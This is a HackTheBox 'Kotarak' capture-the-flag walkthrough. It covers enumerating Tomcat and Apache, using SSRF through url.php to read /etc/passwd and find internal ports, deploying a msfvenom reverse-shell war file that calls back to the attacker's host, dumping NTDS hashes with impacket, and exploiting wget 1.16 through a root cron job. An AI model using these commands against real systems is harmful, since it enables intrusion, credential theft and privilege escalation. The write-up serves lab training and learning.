HackTheBox - Kotarak

Nmap scan results

I will be scanning all the ports, it might take some time.

Services Running

• SSH (OpenSSH 7.2p2)

• Apache Jserv (Protocol v1.3)

• Apache Tomcat 8.5.5

• Apache httpd 2.4.18 ((Ubuntu))

Basic nmap scan would have not disclosed the Apache server, so that's the reason we did a all port scan.

We can probably upload a .war file via the tomcat server to get command execution. But for that to happen, we need manager credentials.

Default/Common Credentials used

• admin:admin

• admin:tomcat

• tomcat:s3cr3t

• admin: <nothing>

Enumerating Apache server

http://kotarak.htb:60000/

Let's run a gobuster scan in the background.

gobuster dir -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -u http://kotarak.htb:60000/ -x php,html,txt -o gobuster-60000.out

__# cat gobuster-60000.out 
/index.php            (Status: 200) [Size: 1169]
/info.php             (Status: 200) [Size: 92262]
/.                    (Status: 200) [Size: 1169]
/url.php              (Status: 200) [Size: 2]

Identifying SSRF Attack

url.php contains a parameter named path and we can add our webserver address to check if it is working or not.

http://kotarak.htb:60000/url.php?path=http://10.10.14.5

It is indeed working, but we cannot exploit it for Remote File Inclusion (RFI) because of the following.

allow_url_include is set to Off, so we can't include any remote PHP files.

We can also try SSRF attack to discover sensitive files. Read more about here.

http://kotarak.htb:60000/url.php?path=file:///etc/passwd

Scanning for localhost ports

Let's try to access localhost. We can FUZZ for local ports using ffuf or wfuzz.

wfuzz -c -w ports.txt --hw 0 -u http://kotarak.htb:60000/url.php?path=http://127.0.0.1:FUZZ/

Something interesting is running at http://kotarak.htb:60000/url.php?path=http://127.0.0.1:888/

Got the credentials for tomcat manager stored in a backup file. Let's login into the manager and get a reverse shell by uploading a war file.

Creating a malicious war file using msfvenom

msfvenom -p java/shell/reverse_tcp LHOST=10.10.14.5 LPORT=9001 -f war -o shell.war

Deploy the shell.war payload and trigger the payload at /shell

Using impacket tool to get all the hashes

We can retrieve credentials from ntds.dit file using the MS Windows registry file.

The Ntds.dit file is a database that stores Active Directory data, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain. ... The extraction and cracking of these passwords can be performed offline, so they will be undetectable.

Using impacket-secretsdump to get all the hashes.

impacket-secretsdump -ntds ntds.dit -system SYSTEM local

Exploiting wget's vulnerability

The root directory is readable and writable and it contains a file named app.log

Version of wget running: Wget/1.16

For this exploit to run, we need a FTP Server and a HTTP server. If you can host a FTP Server using python, try using authbind before it to work

authbind is an Open-source system utility written by Ian Jackson and is distributed under the GNU General Public License. The authbind software allows a program that would normally require superuser privileges to access privileged network services to run as a non-privileged user.

Create .wgetrc file into any writable folder having the following contents.

Now run the FTP server using the following command.

authbind python -m pyftpdlib -p21 -w 

Copy the exploit.py file and edit it according to our needs.

Set the HTTP_LISTEN_IP to all the interfaces and FTP_HOST to target's IP. We also need to change the root cron payload to ours.

Now are good to go, so let's run the script.

Filesystem mounting and stuffs - Great video by Ippsec

Another method to escalate privileges (Kernel Exploit)

Running linux exploit suggester to get a list of possible kernel exploits.